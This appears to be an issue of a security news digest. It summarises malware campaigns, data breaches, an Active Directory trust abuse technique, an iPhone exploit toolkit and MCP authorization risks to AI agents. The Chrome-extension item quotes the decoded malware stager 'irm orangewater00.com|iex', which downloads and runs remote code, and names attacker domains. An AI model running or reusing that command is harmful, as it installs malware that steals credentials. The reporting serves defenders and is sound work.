Attacks & Vulnerabilities |
Fake CleanMyMac Website Spreads SHub Stealer Through ClickFix Terminal Trick (3 minute read)
A fraudulent CleanMyMac site uses a ClickFix-style social engineering technique to trick macOS users into pasting a malicious Terminal command that silently installs SHub Stealer, bypassing Gatekeeper entirely. The stealer harvests macOS Keychain credentials via a fake system authentication prompt, targets Exodus, Atomic Wallet, Ledger Live, and Trezor Suite for seed-phrase extraction, and persists via a LaunchAgent disguised as a Google software updater that runs every minute. Russian-language keyboard layouts trigger immediate self-termination, a common indicator of Russian-nexus cybercriminal origin. |
Hundreds of Salesforce Customers Allegedly Targeted in New Data Theft Campaign (2 minute read)
ShinyHunters is abusing misconfigured Salesforce Experience Cloud guest-user settings and a customized Aura Inspector tool to mass‑exfiltrate data from hundreds of organizations' CRM instances, then extort victims by threatening to leak it. Salesforce stresses its platform is not vulnerable, shifting responsibility to customers' configuration hygiene and third‑party integrations, making rigorous access reviews and hardening of guest accounts urgent. |
Ericsson US Discloses Data Breach After Service Provider Hack (2 minute read)
Swedish telecom giant Ericsson disclosed that it had suffered a data breach affecting over 16k individuals whose data was held by a third-party service provider. The breached data includes names, addresses, SSNs, driver's license numbers, government-issued ID numbers, financial information, medical information, and dates of birth. No cybercrime group has claimed the breach, suggesting that the third party may have paid the ransom, or the cybercriminals could not link the data to Ericsson. |
|
How to scan for vulnerabilities with GitHub Security Lab's open source AI-powered framework (20 minute read)
GitHub Security Lab's open source Taskflow Agent employs a multi-stage LLM pipeline — threat modeling, issue suggestion, and thorough audit — to detect high-impact auth bypasses, IDORs, and logic flaws with a low hallucination rate. It has identified over 80 vulnerabilities across more than 40 repositories so far. Out of 1,003 suggested issues, only 21% met the criteria for impactful reporting, with business logic flaws having the highest true-positive rate at 25%, and IDOR issues exceeding combined XSS and CSRF cases. Notable confirmed findings include a privilege escalation in Outline (CVE-2025-64487), PII exposure in WooCommerce (CVE-2025-15033) and Spree (CVE-2026-25758), and a universal authentication bypass in Rocket.Chat's microservices DDP layer (CVE-2026-28514) caused by a missing await on a bcrypt Promise. |
From a Sophisticated Browser-Extension Supply-Chain Compromise to a VibeCoded Twist: A Chrome Extension as the Initial Access Vector for a Broader Malware Chain (9 minute read)
The Featured Chrome extension ShotBird (ID: gengfhhkjekmlejbhmmopegofnoifnjp) was weaponized after an ownership transfer between December 2025 and March 2026, transformed into a remote-controlled malware channel that beaconed to api.getextensionanalytics.top, stripped CSP/X-Frame-Options headers via declarative rules.json, injected fake Chrome update lures, and exfiltrated form data including passwords, card/CVV, IBAN, and SSN fields. The file-delivery path dropped googleupdate.exe (SHA256: E8D2ED43...), a WiX Burn bootstrapper bundling a legitimate Google-signed ChromeSetup.exe alongside a stager psfx.msi that decoded to irm orangewater00.com|iex. PowerShell Script Block Logging (Event ID 4104) reconstructed a second stage from 115 fragments, revealing ETW suppression via PSEtwLogProvider, Windows Credential Manager enumeration, Chromium Login Data and Web Data targeting, and exfiltration routines — with infrastructure and endpoint patterns overlapping a parallel campaign involving the QuickLens extension documented by Annex Security. |
Trust no one: are one-way trusts really one way? (9 minute read)
One-way Active Directory forest trusts are widely assumed to enforce a strict, unidirectional access model, but stored trust passwords quietly break that boundary. By extracting the trusted domain object (TDO) secret from the trusting forest, attackers with Domain Admin rights there can derive Kerberos keys for the TRUST_ACCOUNT in the trusted forest and log in as a valid domain user. The new tdo_dump.py tool automates remote extraction and key derivation via DRS replication calls, enabling LDAP recon, computer account creation, and Kerberoasting across what should be a one-way security barrier. For security teams, one-way "admin forest" designs no longer guarantee directionality. Hardening must assume compromise of a relying forest gives a foothold back into the management forest. |
|
PyLingual (GitHub Repo)
PyLingual is an open-source CPython bytecode decompiler supporting all Python versions from 3.6 onward, with auto-detection of .pyc version, a segmentation model for control-flow reconstruction, and a web service at pylingual.io for browser-based use. |
Cylake (Product Launch)
Cylake is a cybersecurity platform that runs fully on-prem or in a private cloud to protect highly regulated organizations barred from using public cloud, emphasizing data and operational sovereignty. |
Fray (GitHub Repo)
Open-source WAF bypass toolkit with over 4,300 payloads, 27 recon checks, AI-assisted bypass, and security hardening. Designed for pentesters, bug bounty hunters, and DevSecOps. |
|
An iPhone-hacking toolkit used by Russian spies likely came from US military contractor (5 minute read)
The 23-component iPhone exploit toolkit dubbed "Coruna" — targeting iOS 13 through 17.2.1 — has been traced by former employees and iVerify researchers to L3Harris's Trenchant division, originally built for Five Eyes intelligence customers. Former Trenchant GM Peter Williams, sentenced to seven years last month, sold eight company tools to Russian zero-day broker Operation Zero for $1.3M, providing a likely path by which Coruna reached Russian espionage group UNC6353 and later Chinese cybercriminals. Two Coruna exploits (Photon and Gallium) have also been linked to Operation Triangulation, the sophisticated iOS campaign first disclosed by Kaspersky in 2023. |
The MCP AuthN/Z Nightmare (6 minute read)
Doyensec maps the full OAuth 2.0/dynamic client registration attack surface in MCP deployments, covering tool poisoning, rug pulls, schema poisoning, prompt injection via tool responses, command injection (CVE-2025-53100, CVE-2025-53818), SSO metadata manipulation (CVE-2025-4144, CVE-2025-4143), DNS rebinding against unauthenticated localhost WebSocket servers, and OIDC discovery endpoint abuse. The proposed Identity Assertion JWT Authorization Grant (JAG) enterprise authorization model introduces four unresolved risks: no token revocation path for misbehaving agents, LLM-driven scope escalation without user consent, undefined client credential issuance enabling scope namespace collision and resource identifier injection, and ID-JAG replay amplifying blast radius across multiple MCP access tokens. Security teams auditing MCP deployments should treat every step of the authorization chain as an injection point and prioritize mTLS/certificate-based trust anchors, strict resource namespacing, centralized access invalidation, and explicit per-action consent gates for high-risk tool calls. |
Agent Safety is a Box (6 minute read)
AI agents are highly flexible and adaptable systems that can affect the outside world via side effects. To effectively secure these workflows, we need to add a deterministic "box" around the agent. In a cloud environment, agents can run in an AgentCore Runtime, which utilizes an AgentCore Gateway to restrict the access an agent has outside of the "box," and an AgentCore Policy can be utilized to grant the agent authorization to use specific tools in a specific way. |
|
FBI alert: scammers target zoning permit applicants (1 minute read)
The FBI issued a PSA warning that criminals are impersonating city and county planning officials in targeted phishing campaigns, using publicly available permit data to craft convincing emails with real property addresses, case numbers, and official names to solicit fraudulent payments via wire transfer, P2P apps, or cryptocurrency. |
|
| Love TLDR? Tell your friends and get rewards! | | Share your referral link below with friends to get free TLDR swag! | | | |
| Track your referrals here. |
|
| |
0 Comments